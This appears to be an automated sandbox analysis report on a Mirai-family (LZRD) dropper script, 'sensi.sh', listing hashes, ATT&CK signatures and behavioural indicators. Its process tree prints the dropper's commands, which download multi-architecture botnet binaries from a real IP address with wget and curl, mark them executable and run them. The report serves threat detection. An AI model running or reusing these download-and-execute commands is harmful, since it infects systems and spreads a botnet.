Analysis
-
max time kernel
58s -
max time network
150s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240611-en -
resource tags
arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system -
submitted
26-12-2024 04:07
Static task
static1
Behavioral task
behavioral1
Sample
sensi.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
sensi.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
sensi.sh
Resource
debian9-mipsbe-20240418-en
General
-
Target
sensi.sh
-
Size
1KB
-
MD5
f610810764eec4dd2eed9f4e0e66121b
-
SHA1
98af7417d18cf6bf49a61104a4aebbaac59a0f39
-
SHA256
7e6ff187d2f1740e90596f19c2bd843495849a3c38dbdae69658bca46bf92705
-
SHA512
189710551b60f60dfd94fa21333c58e0d0f0e230d8ca60f33fc8f2fd9f1df2d58b56e969e0639f3ae6d4ed4e27f16fa84239628b86122f434f3baadf6af3826c
Malware Config
Extracted
mirai
LZRD
Signatures
-
Mirai family
-
Contacts a large (196691) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
File and Directory Permissions Modification 1 TTPs 10 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 1593 chmod 1604 chmod 1615 chmod 1523 chmod 1534 chmod 1571 chmod 1582 chmod 1510 chmod 1547 chmod 1560 chmod -
Executes dropped EXE 10 IoCs
ioc pid Process /tmp/SSH 1511 SSH /tmp/SSH 1524 SSH /tmp/SSH 1535 SSH /tmp/SSH 1548 SSH /tmp/SSH 1561 SSH /tmp/SSH 1572 SSH /tmp/SSH 1583 SSH /tmp/SSH 1594 SSH /tmp/SSH 1605 SSH /tmp/SSH 1616 SSH -
Modifies Watchdog functionality 1 TTPs 20 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
description ioc Process File opened for modification /dev/watchdog SSH File opened for modification /dev/misc/watchdog SSH File opened for modification /dev/watchdog SSH File opened for modification /dev/watchdog SSH File opened for modification /dev/misc/watchdog SSH File opened for modification /dev/misc/watchdog SSH File opened for modification /dev/misc/watchdog SSH File opened for modification /dev/misc/watchdog SSH File opened for modification /dev/misc/watchdog SSH File opened for modification /dev/misc/watchdog SSH File opened for modification /dev/watchdog SSH File opened for modification /dev/misc/watchdog SSH File opened for modification /dev/misc/watchdog SSH File opened for modification /dev/misc/watchdog SSH File opened for modification /dev/watchdog SSH File opened for modification /dev/watchdog SSH File opened for modification /dev/watchdog SSH File opened for modification /dev/watchdog SSH File opened for modification /dev/watchdog SSH File opened for modification /dev/watchdog SSH -
Enumerates active TCP sockets 1 TTPs 10 IoCs
Gets active TCP sockets from /proc virtual filesystem.
description ioc Process File opened for reading /proc/net/tcp SSH File opened for reading /proc/net/tcp SSH File opened for reading /proc/net/tcp SSH File opened for reading /proc/net/tcp SSH File opened for reading /proc/net/tcp SSH File opened for reading /proc/net/tcp SSH File opened for reading /proc/net/tcp SSH File opened for reading /proc/net/tcp SSH File opened for reading /proc/net/tcp SSH File opened for reading /proc/net/tcp SSH -
Enumerates running processes
Discovers information about currently running processes on the system
-
resource yara_rule behavioral1/files/fstream-1.dat upx -
Reads system network configuration 1 TTPs 10 IoCs
Uses contents of /proc filesystem to enumerate network settings.
description ioc Process File opened for reading /proc/net/tcp SSH File opened for reading /proc/net/tcp SSH File opened for reading /proc/net/tcp SSH File opened for reading /proc/net/tcp SSH File opened for reading /proc/net/tcp SSH File opened for reading /proc/net/tcp SSH File opened for reading /proc/net/tcp SSH File opened for reading /proc/net/tcp SSH File opened for reading /proc/net/tcp SSH File opened for reading /proc/net/tcp SSH -
description ioc Process File opened for reading /proc/1512/fd SSH File opened for reading /proc/966/fd SSH File opened for reading /proc/486/fd SSH File opened for reading /proc/1159/fd SSH File opened for reading /proc/1345/fd SSH File opened for reading /proc/481/fd SSH File opened for reading /proc/322/fd SSH File opened for reading /proc/1191/fd SSH File opened for reading /proc/271/fd SSH File opened for reading /proc/449/fd SSH File opened for reading /proc/1514/fd SSH File opened for reading /proc/957/fd SSH File opened for reading /proc/1181/fd SSH File opened for reading /proc/1590/fd SSH File opened for reading /proc/314/fd SSH File opened for reading /proc/1223/exe SSH File opened for reading /proc/473/fd SSH File opened for reading /proc/1308/fd SSH File opened for reading /proc/516/fd SSH File opened for reading /proc/314/fd SSH File opened for reading /proc/666/fd SSH File opened for reading /proc/1287/fd SSH File opened for reading /proc/464/fd SSH File opened for reading /proc/482/fd SSH File opened for reading /proc/952/fd SSH File opened for reading /proc/481/fd SSH File opened for reading /proc/1575/fd SSH File opened for reading /proc/1066/fd SSH File opened for reading /proc/1590/fd SSH File opened for reading /proc/1143/fd SSH File opened for reading /proc/1013/fd SSH File opened for reading /proc/1337/fd SSH File opened for reading /proc/1142/fd SSH File opened for reading /proc/596/fd SSH File opened for reading /proc/1063/fd SSH File opened for reading /proc/1542/fd SSH File opened for reading /proc/650/fd SSH File opened for reading /proc/1253/fd SSH File opened for reading /proc/490/fd SSH File opened for reading /proc/596/fd SSH File opened for reading /proc/1555/fd SSH File opened for reading /proc/1184/fd SSH File opened for reading /proc/674/fd SSH File opened for reading /proc/1171/fd SSH File opened for reading /proc/1608/fd SSH File opened for reading /proc/957/fd SSH File opened for reading /proc/493/fd SSH File opened for reading /proc/597/fd SSH File opened for reading /proc/1186/fd SSH File opened for reading /proc/493/fd SSH File opened for reading /proc/1307/fd SSH File opened for reading /proc/1504/fd SSH File opened for reading /proc/1142/fd SSH File opened for reading /proc/1518/fd SSH File opened for reading /proc/1568/fd SSH File opened for reading /proc/515/fd SSH File opened for reading /proc/1166/fd SSH File opened for reading /proc/674/fd SSH File opened for reading /proc/1283/fd SSH File opened for reading /proc/1520/fd SSH File opened for reading /proc/322/fd SSH File opened for reading /proc/567/fd SSH File opened for reading /proc/1125/fd SSH File opened for reading /proc/551/fd SSH -
System Network Configuration Discovery 1 TTPs 2 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 1515 wget 1521 curl -
Writes file to tmp directory 20 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/xd.mips curl File opened for modification /tmp/xd.mpsl wget File opened for modification /tmp/xd.arm6 wget File opened for modification /tmp/xd.x86 curl File opened for modification /tmp/xd.mips wget File opened for modification /tmp/xd.arm6 curl File opened for modification /tmp/xd.arm7 wget File opened for modification /tmp/xd.ppc wget File opened for modification /tmp/xd.m68k curl File opened for modification /tmp/xd.sh4 curl File opened for modification /tmp/xd.arm4 curl File opened for modification /tmp/xd.ppc curl File opened for modification /tmp/xd.sh4 wget File opened for modification /tmp/xd.x86 wget File opened for modification /tmp/SSH sensi.sh File opened for modification /tmp/xd.mpsl curl File opened for modification /tmp/xd.arm5 wget File opened for modification /tmp/xd.arm5 curl File opened for modification /tmp/xd.arm7 curl File opened for modification /tmp/xd.m68k wget
Processes
-
/tmp/sensi.sh/tmp/sensi.sh1⤵
- Writes file to tmp directory
PID:1502 -
/usr/bin/wgetwget http://107.150.62.186/d/xd.x862⤵
- Writes file to tmp directory
PID:1503
-
-
/usr/bin/curlcurl -O http://107.150.62.186/d/xd.x862⤵
- Writes file to tmp directory
PID:1508
-
-
/bin/catcat xd.x862⤵PID:1509
-
-
/bin/chmodchmod +x config-err-RpIWNX netplan_jpikt7da sensi.sh snap-private-tmp SSH ssh-82ootvY3E0by systemd-private-a4457c15b5b74858b76596bff6ba19dc-bolt.service-AVwVKu systemd-private-a4457c15b5b74858b76596bff6ba19dc-colord.service-04jKAy systemd-private-a4457c15b5b74858b76596bff6ba19dc-ModemManager.service-eW55qV systemd-private-a4457c15b5b74858b76596bff6ba19dc-systemd-resolved.service-IibRw9 systemd-private-a4457c15b5b74858b76596bff6ba19dc-systemd-timedated.service-Qk62GN xd.x862⤵
- File and Directory Permissions Modification
PID:1510
-
-
/tmp/SSH./SSH2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Reads system network configuration
- Reads runtime system information
PID:1511
-
-
/usr/bin/wgetwget http://107.150.62.186/d/xd.mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1515
-
-
/usr/bin/curlcurl -O http://107.150.62.186/d/xd.mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1521
-
-
/bin/chmodchmod +x config-err-RpIWNX netplan_jpikt7da sensi.sh snap-private-tmp SSH ssh-82ootvY3E0by systemd-private-a4457c15b5b74858b76596bff6ba19dc-bolt.service-AVwVKu systemd-private-a4457c15b5b74858b76596bff6ba19dc-colord.service-04jKAy systemd-private-a4457c15b5b74858b76596bff6ba19dc-ModemManager.service-eW55qV systemd-private-a4457c15b5b74858b76596bff6ba19dc-systemd-resolved.service-IibRw9 systemd-private-a4457c15b5b74858b76596bff6ba19dc-systemd-timedated.service-Qk62GN xd.mips xd.x862⤵
- File and Directory Permissions Modification
PID:1523
-
-
/tmp/SSH./SSH2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Reads system network configuration
- Reads runtime system information
PID:1524
-
-
/usr/bin/wgetwget http://107.150.62.186/d/xd.mpsl2⤵
- Writes file to tmp directory
PID:1528
-
-
/usr/bin/curlcurl -O http://107.150.62.186/d/xd.mpsl2⤵
- Writes file to tmp directory
PID:1532
-
-
/bin/chmodchmod +x config-err-RpIWNX netplan_jpikt7da sensi.sh snap-private-tmp SSH ssh-82ootvY3E0by systemd-private-a4457c15b5b74858b76596bff6ba19dc-bolt.service-AVwVKu systemd-private-a4457c15b5b74858b76596bff6ba19dc-colord.service-04jKAy systemd-private-a4457c15b5b74858b76596bff6ba19dc-ModemManager.service-eW55qV systemd-private-a4457c15b5b74858b76596bff6ba19dc-systemd-resolved.service-IibRw9 systemd-private-a4457c15b5b74858b76596bff6ba19dc-systemd-timedated.service-Qk62GN xd.mips xd.mpsl xd.x862⤵
- File and Directory Permissions Modification
PID:1534
-
-
/tmp/SSH./SSH2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Reads system network configuration
- Reads runtime system information
PID:1535
-
-
/usr/bin/wgetwget http://107.150.62.186/d/xd.arm42⤵PID:1539
-
-
/usr/bin/curlcurl -O http://107.150.62.186/d/xd.arm42⤵
- Writes file to tmp directory
PID:1545
-
-
/bin/chmodchmod +x config-err-RpIWNX netplan_jpikt7da sensi.sh snap-private-tmp SSH ssh-82ootvY3E0by systemd-private-a4457c15b5b74858b76596bff6ba19dc-bolt.service-AVwVKu systemd-private-a4457c15b5b74858b76596bff6ba19dc-colord.service-04jKAy systemd-private-a4457c15b5b74858b76596bff6ba19dc-ModemManager.service-eW55qV systemd-private-a4457c15b5b74858b76596bff6ba19dc-systemd-resolved.service-IibRw9 systemd-private-a4457c15b5b74858b76596bff6ba19dc-systemd-timedated.service-Qk62GN xd.arm4 xd.mips xd.mpsl xd.x862⤵
- File and Directory Permissions Modification
PID:1547
-
-
/tmp/SSH./SSH2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Reads system network configuration
- Reads runtime system information
PID:1548
-
-
/usr/bin/wgetwget http://107.150.62.186/d/xd.arm52⤵
- Writes file to tmp directory
PID:1552
-
-
/usr/bin/curlcurl -O http://107.150.62.186/d/xd.arm52⤵
- Writes file to tmp directory
PID:1556
-
-
/bin/chmodchmod +x config-err-RpIWNX netplan_jpikt7da sensi.sh snap-private-tmp SSH ssh-82ootvY3E0by systemd-private-a4457c15b5b74858b76596bff6ba19dc-bolt.service-AVwVKu systemd-private-a4457c15b5b74858b76596bff6ba19dc-colord.service-04jKAy systemd-private-a4457c15b5b74858b76596bff6ba19dc-ModemManager.service-eW55qV systemd-private-a4457c15b5b74858b76596bff6ba19dc-systemd-resolved.service-IibRw9 systemd-private-a4457c15b5b74858b76596bff6ba19dc-systemd-timedated.service-Qk62GN xd.arm4 xd.arm5 xd.mips xd.mpsl xd.x862⤵
- File and Directory Permissions Modification
PID:1560
-
-
/tmp/SSH./SSH2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Reads system network configuration
- Reads runtime system information
PID:1561
-
-
/usr/bin/wgetwget http://107.150.62.186/d/xd.arm62⤵
- Writes file to tmp directory
PID:1565
-
-
/usr/bin/curlcurl -O http://107.150.62.186/d/xd.arm62⤵
- Writes file to tmp directory
PID:1569
-
-
/bin/chmodchmod +x config-err-RpIWNX netplan_jpikt7da sensi.sh snap-private-tmp SSH ssh-82ootvY3E0by systemd-private-a4457c15b5b74858b76596bff6ba19dc-bolt.service-AVwVKu systemd-private-a4457c15b5b74858b76596bff6ba19dc-colord.service-04jKAy systemd-private-a4457c15b5b74858b76596bff6ba19dc-ModemManager.service-eW55qV systemd-private-a4457c15b5b74858b76596bff6ba19dc-systemd-resolved.service-IibRw9 systemd-private-a4457c15b5b74858b76596bff6ba19dc-systemd-timedated.service-Qk62GN xd.arm4 xd.arm5 xd.arm6 xd.mips xd.mpsl xd.x862⤵
- File and Directory Permissions Modification
PID:1571
-
-
/tmp/SSH./SSH2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Reads system network configuration
- Reads runtime system information
PID:1572
-
-
/usr/bin/wgetwget http://107.150.62.186/d/xd.arm72⤵
- Writes file to tmp directory
PID:1576
-
-
/usr/bin/curlcurl -O http://107.150.62.186/d/xd.arm72⤵
- Writes file to tmp directory
PID:1580
-
-
/bin/chmodchmod +x config-err-RpIWNX netplan_jpikt7da sensi.sh snap-private-tmp SSH ssh-82ootvY3E0by systemd-private-a4457c15b5b74858b76596bff6ba19dc-bolt.service-AVwVKu systemd-private-a4457c15b5b74858b76596bff6ba19dc-colord.service-04jKAy systemd-private-a4457c15b5b74858b76596bff6ba19dc-ModemManager.service-eW55qV systemd-private-a4457c15b5b74858b76596bff6ba19dc-systemd-resolved.service-IibRw9 systemd-private-a4457c15b5b74858b76596bff6ba19dc-systemd-timedated.service-Qk62GN xd.arm4 xd.arm5 xd.arm6 xd.arm7 xd.mips xd.mpsl xd.x862⤵
- File and Directory Permissions Modification
PID:1582
-
-
/tmp/SSH./SSH2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Reads system network configuration
- Reads runtime system information
PID:1583
-
-
/usr/bin/wgetwget http://107.150.62.186/d/xd.ppc2⤵
- Writes file to tmp directory
PID:1587
-
-
/usr/bin/curlcurl -O http://107.150.62.186/d/xd.ppc2⤵
- Writes file to tmp directory
PID:1591
-
-
/bin/chmodchmod +x config-err-RpIWNX netplan_jpikt7da sensi.sh snap-private-tmp SSH ssh-82ootvY3E0by systemd-private-a4457c15b5b74858b76596bff6ba19dc-bolt.service-AVwVKu systemd-private-a4457c15b5b74858b76596bff6ba19dc-colord.service-04jKAy systemd-private-a4457c15b5b74858b76596bff6ba19dc-ModemManager.service-eW55qV systemd-private-a4457c15b5b74858b76596bff6ba19dc-systemd-resolved.service-IibRw9 systemd-private-a4457c15b5b74858b76596bff6ba19dc-systemd-timedated.service-Qk62GN xd.arm4 xd.arm5 xd.arm6 xd.arm7 xd.mips xd.mpsl xd.ppc xd.x862⤵
- File and Directory Permissions Modification
PID:1593
-
-
/tmp/SSH./SSH2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Reads system network configuration
- Reads runtime system information
PID:1594
-
-
/usr/bin/wgetwget http://107.150.62.186/d/xd.m68k2⤵
- Writes file to tmp directory
PID:1598
-
-
/usr/bin/curlcurl -O http://107.150.62.186/d/xd.m68k2⤵
- Writes file to tmp directory
PID:1602
-
-
/bin/chmodchmod +x config-err-RpIWNX netplan_jpikt7da sensi.sh snap-private-tmp SSH ssh-82ootvY3E0by systemd-private-a4457c15b5b74858b76596bff6ba19dc-bolt.service-AVwVKu systemd-private-a4457c15b5b74858b76596bff6ba19dc-colord.service-04jKAy systemd-private-a4457c15b5b74858b76596bff6ba19dc-ModemManager.service-eW55qV systemd-private-a4457c15b5b74858b76596bff6ba19dc-systemd-resolved.service-IibRw9 systemd-private-a4457c15b5b74858b76596bff6ba19dc-systemd-timedated.service-Qk62GN xd.arm4 xd.arm5 xd.arm6 xd.arm7 xd.m68k xd.mips xd.mpsl xd.ppc xd.x862⤵
- File and Directory Permissions Modification
PID:1604
-
-
/tmp/SSH./SSH2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Reads system network configuration
- Reads runtime system information
PID:1605
-
-
/usr/bin/wgetwget http://107.150.62.186/d/xd.sh42⤵
- Writes file to tmp directory
PID:1609
-
-
/usr/bin/curlcurl -O http://107.150.62.186/d/xd.sh42⤵
- Writes file to tmp directory
PID:1613
-
-
/bin/chmodchmod +x config-err-RpIWNX netplan_jpikt7da sensi.sh snap-private-tmp SSH ssh-82ootvY3E0by systemd-private-a4457c15b5b74858b76596bff6ba19dc-bolt.service-AVwVKu systemd-private-a4457c15b5b74858b76596bff6ba19dc-colord.service-04jKAy systemd-private-a4457c15b5b74858b76596bff6ba19dc-ModemManager.service-eW55qV systemd-private-a4457c15b5b74858b76596bff6ba19dc-systemd-resolved.service-IibRw9 systemd-private-a4457c15b5b74858b76596bff6ba19dc-systemd-timedated.service-Qk62GN xd.arm4 xd.arm5 xd.arm6 xd.arm7 xd.m68k xd.mips xd.mpsl xd.ppc xd.sh4 xd.x862⤵
- File and Directory Permissions Modification
PID:1615
-
-
/tmp/SSH./SSH2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Reads system network configuration
- Reads runtime system information
PID:1616
-
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Impair Defenses
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
29KB
MD59c04ed95992e4b7589d2cfaf2b6b6afb
SHA1f512b4b75401213c5734fc1c724e00b9dd7fdafb
SHA256ca0dad92996c7ba5fbb49e82fc119e6b7a4ef91e060f8aff17b92e93f8bf5185
SHA512f093f6c21d840575cefb2bf3d1b4f4a3f9f3729c4c74c17846aa194223cbe0dd7eb182c55ae15f31d496671e0d6ea1a6f0dd3d2b10e1f32f396f0f573d28db92